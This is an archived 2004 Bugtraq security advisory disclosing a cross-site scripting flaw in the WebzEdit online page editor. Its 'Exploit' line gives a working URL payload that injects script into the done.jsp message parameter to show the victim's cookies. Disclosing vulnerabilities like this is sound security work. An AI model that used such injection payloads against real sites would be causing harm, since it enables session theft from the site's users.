lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040221151330.31151.qmail@www.securityfocus.com>
Date: 21 Feb 2004 15:13:30 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: Cross Site Scripting in WebzEdit




Title:Cross Site Scripting in WebzEdit
Release Date: Feb 22,2004 
Application: WebzEdit 
Version Affected: 1.9 or lower 
Platform: JSP 
Severity: Low 
Discover: Cheng Peng Su(apple_soup[at]msn.com) 
Vendor URL: http://www.freewebs.com/ 
################################################ 
Intro:
     WebzEdit is a tool to edit web page online.

Proof Of Concept: 
     This page (http://host/WebzEdit/done.jsp?message=index.htm%20has%20been%20saved.) will show you a Message box with "index.htm has been saved." , and the [done.jsp] doesn't filter out illegal characters.
     So here is a XSS vuln:
     URL:http://host/WebzEdit/done.jsp?message=');[XSS code];a=escape('

Exploit: 
URL:http://host/WebzEdit/done.jsp?message=');alert(document.cookie);a=escape('



----------------------------------------------------------
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University,
Wuhan,Hubei,China
email:apple_soup[at]msn.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ